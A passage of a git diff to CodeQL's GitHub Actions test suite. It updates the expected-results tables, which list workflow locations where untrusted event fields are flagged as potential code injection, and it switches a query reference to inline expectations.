| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref index 9af8ec0f9ab..6fc87669b07 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionCritical.ql +query: Security/CWE-094/CodeInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4bbe7da0aaf..fc6f8aa5820 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,3 +1,62 @@ +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
